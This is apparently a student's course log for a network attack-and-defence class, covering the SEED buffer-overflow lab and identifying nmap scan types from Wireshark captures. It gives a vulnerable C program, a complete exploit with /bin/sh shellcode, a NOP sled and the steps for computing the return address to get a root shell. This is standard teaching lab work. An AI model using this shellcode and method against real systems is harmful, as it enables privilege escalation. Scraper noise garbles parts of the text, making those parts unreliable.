20169208 2016-2017-2 《网络攻防实践》第10周学习总结

时间 2019-11-08

原文原文链接

20169208 2016-2017-2 《网络攻防实践》第11周学习总结

缓冲区溢出实验

教学网址：https://www.shiyanlou.com/courses/231
一、实验准备
按照操做执行命令。
二、初始设置
sudo sysctl -w kernel.randomize_va_space=0

三、准备漏洞程序
shell

程序代码以下：sass

/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
char buffer[12];

/* The following statement has a buffer overflow problem */
strcpy(buffer, str);

return 1;
}

int main(int argc, char **argv)
{
char str[517];
FILE *badfile;
badfile = fopen("badfile", "r");
fread(str, sizeof(char), 517, badfile);
bof(str);
printf("Returned Properly\n");
return 1;
}

四、攻击程序
咱们的目的是攻击刚才的漏洞程序，并经过攻击得到root权限。网络

把如下代码保存为“exploit.c”文件，保存到 /tmp 目录下。
攻击程序代码以下：app

/ exploit.c /

/ A program that creates a file containing code for launching shell/

char shellcode[]=

"\x31\xc0" //xorl %eax,%eax

"\x50" //pushl %eax

"\x68""//sh" //pushl $0x68732f2f

"\x68""/bin" //pushl $0x6e69622f

"\x89\xe3" //movl %esp,%ebx

"\x50" //pushl %eax

"\x53" //pushl %ebx

"\x89\xe1" //movl %esp,%ecx

"\x99" //cdq

"\xb0\x0b" //movb $0x0b,%al

"\xcd\x80" //int $0x80

;

void main(int argc, char **argv)

{

char buffer[517];

FILE *badfile;

/ Initialize buffer with 0x90 (NOP instruction) /

memset(&buffer, 0x90, 517);

/ You need to fill the buffer with appropriate contents here /

strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x??\x??\x??\x??");

strcpy(buffer+100,shellcode);

/ Save the contents to the file "badfile" /

badfile = fopen("./badfile", "w");

fwrite(buffer, 517, 1, badfile);

fclose(badfile);

}

注意上面的代码，“\x??\x??\x??\x??”处须要添上shellcode保存在内存中的地址，由于发生溢出后这个位置恰好能够覆盖返回地址。dom

而 strcpy(buffer+100,shellcode); 这一句又告诉咱们，shellcode保存在 buffer+100 的位置。学习

如今咱们要获得shellcode在内存中的地址，输入命令：this

gdb stack
disass main

结果以下图：

接下来：
spa

根据语句 strcpy(buffer+100,shellcode); 咱们计算shellcode的地址为 0xffffd020(十六进制)+100(十进制)=0xffffd084(十六进制)3d

如今修改exploit.c文件！将 \x??\x??\x??\x?? 修改成 \x84\xd0\xff\xff

编译
gcc -m32 -o exploit exploit.c
运行文件code

./exploit
./stack

出现了问题以下：

若是不能攻击成功，提示”段错误“，从新使用gdb反汇编，计算内存地址。

如图，个人str地址为0xffffd020，通过计算后可得0xffffd084
修改exploit中相应数据后，攻击成功。

nmap和wireshark实验

防守时所采起的命令：

对获得的文件使用wireshark分析：

首先能够判断使用了ping命令。

由图可判断，接收到的都是TCP的SYN请求，能够判断使用的是nmap -sS命令。
Nmap -sS不须要经过完整的握手，就能得到远程主机的信息。Nmap发送SYN包到远程主机，可是它不会产生任何会话

猜想为nmap的-sU命令。
顾名思义,这种扫描技术用来寻找目标主机打开的UDP端口.它不须要发送任何的SYN包，由于这种技术是针对UDP端口的。UDP扫描发送UDP数据包到目标主机，并等待响应,若是返回ICMP不可达的错误消息，说明端口是关闭的，若是获得正确的适当的回应，说明端口是开放的。

由图中红框内内容，被攻击的主机返回了本身FTP服务的版本号，推测使用了nmap -sV命令。
版本检测是用来扫描目标主机和端口上运行的软件的版本.它不一样于其它的扫描技术，它不是用来扫描目标主机上开放的端口，不过它须要从开放的端口获取信息来判断软件的版本.使用版本检测扫描以前须要先用TCP SYN扫描开放了哪些端口。

参考资料

网络攻防技术与实践 (官网)